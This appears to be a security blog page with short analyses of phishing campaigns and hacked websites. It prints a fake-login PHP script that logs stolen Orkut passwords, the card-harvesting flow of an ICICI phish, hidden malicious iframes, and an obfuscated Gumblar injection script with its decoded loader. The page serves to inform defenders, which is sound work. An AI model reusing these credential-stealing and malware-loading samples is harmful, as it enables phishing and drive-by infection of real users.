Nice Video – About Phishing Scam

Bank Phish

This is phish email for ICICI (submitted to phishtank)

hosted to

hxxp://ayitipeyipam.org/css/data/onlineverification.do/

from here it redirects to

hxxp:/ayitipeyipam.org/css/data/onlineverification.do/index2.html

there is twist here

See it

 

this page is very same to paypal ,confirmed with the script

   1: // This is an ugly hack until there is a reliable ondomready function

   2:                            if(typeof PAYPAL != 'undefined'){

   3:                                PAYPAL.core.Navigation.init();

   4:                           }</scr

Then it lands on to a page where it asks for card information.

after that it shows thank you message,

and finally lands to Original site ,so user will never know that he has been phished.

   1: <META HTTP-EQUIV="Refresh" CONTENT="5;URL=https://infinity.icicibank.co.in/Login.jsp" ></body>

Comes Again………………

This is with compromised Orkut account , the fake orkut login link are updated as links go down periodically

Here is the new link

hxxp://wwworkutnewscrapcom.tk

this has the iframe to

hxxp://scrap222.kilu.de/index.html

this where the fake page is hosted

Here is the source that executes a php to post the user name and password.

   1: <form id="gaia_loginform" action="run.php" method="get"

   2:         onsubmit="return(gaia_onLoginSubmit());">

php  is similar to following script

   1: <?php /* Created on: 3/27/2007 */ 

   2: $fp = fopen("OrkutPasswords.htm", "a");

   3: fwrite($fp, "Email:$_POST[Email]\tPassword:$_POST[Passwd]");

   4: echo "<HTML>

   5: <head>

   6: <title>Welcome to Hack-Genius</title>

   7: <FRAMESET cols=\"*\">

   8:   <FRAME SRC=\"http://www.hack-genius.blogspot.com\">

   9: </FRAMESET>";?>

this kinda of Fake Orkut is easily downloaded from torrent

Currently is been removed from the torrent site , its good for now.

Following Trail of Luckysploit

Luckysploit was all over the web with mass defacement and serving malware.Today i got an alert for an web page

hxxp://dailybreadhost.com

this site was injected with script which decodes to

hxxp://www.fujifork.co.jp

Following site has 2 iframe

   1: <iframe src='hxxp://www.fujifork.co.jp/' width=1 height=1 style='visibility: hidden'></iframe><iframe src='hxxp://82.103.131.211/maco/?6e662d941e448da7c36e018acb86120b' width=1 height=1 style='visibility: hidden'></iframe>

 

but no malware this time, but still net is not safe. Here is the Safe browsing report for the site for more information

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.dailybreadhost.com/

PM - Site hacked

Following site

pmegp.in/ - Prime Minister's Employment Generation Programme

have been attacked and following malicious script was inserted.

   1:  

   2: (function(){var cVrd='%';var Fvm=unescape(('&76ar&20a&3d&22ScriptE&6egine&22&2cb&3d&22Vers&69on() +&22&2c&6a&3d&22&22&2c&75&3dnav&69g&61t&6fr&2e&75ser&41&67ent&3bif&28(&75&2eind&65xO&66(&22Win&22)&3e&30&29&26&26 (u&2ein&64&65&78&4ff(&22&4e&54&20&36&22)&3c0&29&26&26&28docume&6et&2eco&6fk&69e&2e&69n&64exOf(&22m&69ek&3d&31&22) &3c&30&29&26&26(typeof(zrvzts)&21&3dtyp&65of(&22A&22)))&7bzrvz&74s&3d&22A&22&3beva&6c&28&22if (win&64&6fw&2e&22+a+&22) j&3dj+&22&2ba&2b&22M&61jor&22&2bb&2ba&2b&22&4d&69n&6fr&22+b+&61+&22&42uild&22+b+&22&6a&3b&22) &3bdocum&65n&74&2ewrite (&22&3cscri&70&74&20s&72c&3d&2f&2fg&75&6dblar&2ecn&2frss&2f&3f&69d&3d&22&2bj+&22&3e&3c&5c&2fscrip&74&3e&22&29&3b&7d' ).replace(/&/g,cVrd));eval(Fvm)})();

This is Decrypted to

   1: var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&& (document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+") j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/? id="+j+"><\/script>");}

this is redirects to cn site here is the report on same.

http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn

Crazy Privacy Policy

The following is fake site getting MSN user information

hxxp://thatzparty.com/login.php

Here is the Privacy Policy

“We may temporarily access your MSN account to do a combination of the following: 1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.”

 

what they do is spam, site is registered by  CSS Management Inc, this also have 23 other domains all the same spamming the net.

Counter-eCrime Operations Summit (CeCOS III)

The third annual Counter-eCrime Operations Summit (CeCOS III) will engage questions of operational challenges and the development of common resources for the first responders and forensic professionals who protect consumers and enterprises from the ecrime threat every day. This year's meeting will focus on the development of response paradigms and resources for counter-ecrime managers and forensic professionals. Presenters will proffer case studies of national and regional economies under attack, narratives of successful trans-national forensic cooperation as well as models for cooperation and unified response against ecrime and data resources for forensic activities.